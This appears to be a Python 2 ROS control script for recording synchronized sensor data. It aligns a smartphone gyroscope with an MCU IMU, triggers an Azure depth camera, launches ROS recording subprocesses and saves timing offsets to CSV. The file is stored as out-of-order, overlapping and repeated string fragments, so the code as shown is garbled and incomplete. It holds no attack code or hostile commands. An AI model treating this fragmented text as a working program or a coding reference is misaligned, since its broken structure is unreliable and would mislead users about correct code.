"'--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo,",
"mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts =",
"recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process",
"depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts == None",
"mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start",
"mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence:",
"print_master('Tap Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0]",
"pd from io import StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl",
"start_duration = 1 main_duration = 4 end_duration = 4 # Wait to avoid",
"\"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts",
"'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' :",
"* (start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\",",
"raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns",
"print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if subpr is not None:",
"str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for debugging path = '/'.join(",
"= '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string",
"for subpr in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes =",
"'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21'",
"failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M #",
"finished') # Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) #",
"= 0 while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past +=",
"#flag_to_process = True sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap",
"sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync",
"# Some time needed to get camrera frame data by mcu.cpp time.sleep(0.1) #",
"# Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts",
"= RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split())",
"\"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) +",
": M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' :",
"sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y',",
"input = select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value",
"mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \",",
"+= time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close()",
"HOST = None # The smartphone's IP address class bcolors: HEADER = '\\033[95m'",
"+ str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n'",
"camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess",
"str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' )",
"'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" +",
"pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time',",
"process') input = select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if",
"'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' :",
"open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2)",
"os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1),",
"reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id",
"sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2",
"TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU",
"MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait,",
"mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it",
"None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay",
"Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id =",
"align_camera_subprocess.wait() # Some time needed to get camrera frame data by mcu.cpp time.sleep(0.1)",
"select import os HOST = None # The smartphone's IP address class bcolors:",
"send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data",
"publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate",
"alignment process') input = select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip()",
"/ 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq",
"M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) +",
"# Show mean of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data,",
"depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref =",
"= 1 main_duration = 4 end_duration = 4 # Wait to avoid shaking",
"#mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration)",
"to get camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to",
"import numpy as np import pandas as pd from io import StringIO from",
"everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num",
"sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show()",
"[], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg",
"'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' :",
"sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'],",
"launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset",
"' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data =",
"Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias",
"mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] #",
"video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period",
"record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with everything",
"remote control global remote remote = RemoteControl(HOST) # Launching ROS data collection nodes",
"# Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem",
"sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False",
"consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU",
"+ main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback)",
"problem of the first measurement # Get data from s10 imu sm_df =",
"\"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines(",
"time needed to get a camera frame and its info in mcu.cpp time.sleep(0.1)",
"plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() #",
"mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts == None or depth_cam_ts",
"#imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ),",
"src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg",
"import os HOST = None # The smartphone's IP address class bcolors: HEADER",
"Wait until .launch launched completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync",
"TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter",
"import signal import sys import select import os HOST = None # The",
"RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess)",
"== \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration =",
"+ \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' +",
"start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0] if input: value",
"measurement # Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data",
"next sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0] if input: value",
"plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener",
"as executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration",
"sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration =",
"+ \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ','",
"sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0] if input: value =",
"2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference,",
"to get a camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset =",
"string + bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts",
"frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10)",
"of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time -",
"\\ '\\n' ) ''' # Added for debugging path = '/'.join( ('out', 'master',",
"latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence number: ' +",
"False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync has",
"time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin],",
"# Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data =",
"'\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m'",
"None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister()",
": [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0],",
"= [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts =",
"mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common",
"depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via",
"to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data,",
"data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if",
"- sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\",",
"\"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \",",
"pandas as pd from io import StringIO from src.TimeSync import TimeSync2 import matplotlib",
"# Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) #",
"'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join(",
"print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration",
"queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num))",
"= select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value ==",
"'\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD",
"sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts",
"Starting smartphone remote control global remote remote = RemoteControl(HOST) # Launching ROS data",
"(path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False )",
"value = sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\"",
"future.result() print_master('IMUs gathering finished') # Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data)",
"data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch",
"msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input()",
"3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg =",
"= subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a camera",
"pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv(",
"index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period'",
"len(args) == 1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global",
"global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1: print 'Please,",
"/ 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time",
"Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait",
"_ = future.result() print_master('IMUs gathering finished') # Get data from mcu imu mcu_gyro_data",
"print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get data from",
": [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset],",
"Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute",
"rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to",
"select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"):",
"= \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2(",
"[sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01'",
"msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to",
"to start recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video()",
"if len(args) == 1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit()",
"on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period =",
"comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time",
"+ bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts =",
"1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate the next",
"ERROR: ' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data",
"data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while True: print_master('Tap",
"data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy()",
"running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if remote is not None:",
"camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True,",
"Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started.",
"sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and",
"sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired timestamp",
"\" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split())",
"None mcu_cam_ts = None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat",
"sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False )",
"global remote remote = RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess =",
"+ bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string",
"mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x,",
"= data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1:",
"), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun",
"M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv')",
"depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num))",
": [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' :",
"\".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts)",
"running_subpr_list = [] for subpr in subpr_list: if subpr is not None: subpr.terminate()",
"print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M",
"1000 * (start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener =",
"data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1: print",
"data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def",
"as pd from io import StringIO from src.TimeSync import TimeSync2 import matplotlib as",
"TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun",
"mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' +",
"by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface",
"s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns",
"as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ','",
"'\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m'",
"Check if IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False",
"collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched",
"launched completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment process') input",
"a camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference,",
"\"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration = 4",
"True: print_master('Tap Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [],",
"mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration",
"depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp =",
"\", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0]",
"remote is not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) #",
"control global remote remote = RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess",
"= 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate the",
") os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape)",
"= '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC =",
"\", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time)",
"header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 #",
"bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the",
"s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time =",
"imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time =",
"+ string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: '",
"time_past = 0 while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past",
"signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote remote = RemoteControl(HOST) #",
"[mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2],",
"1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration = 4 # Wait",
"mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a camera frame and",
"#msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg)",
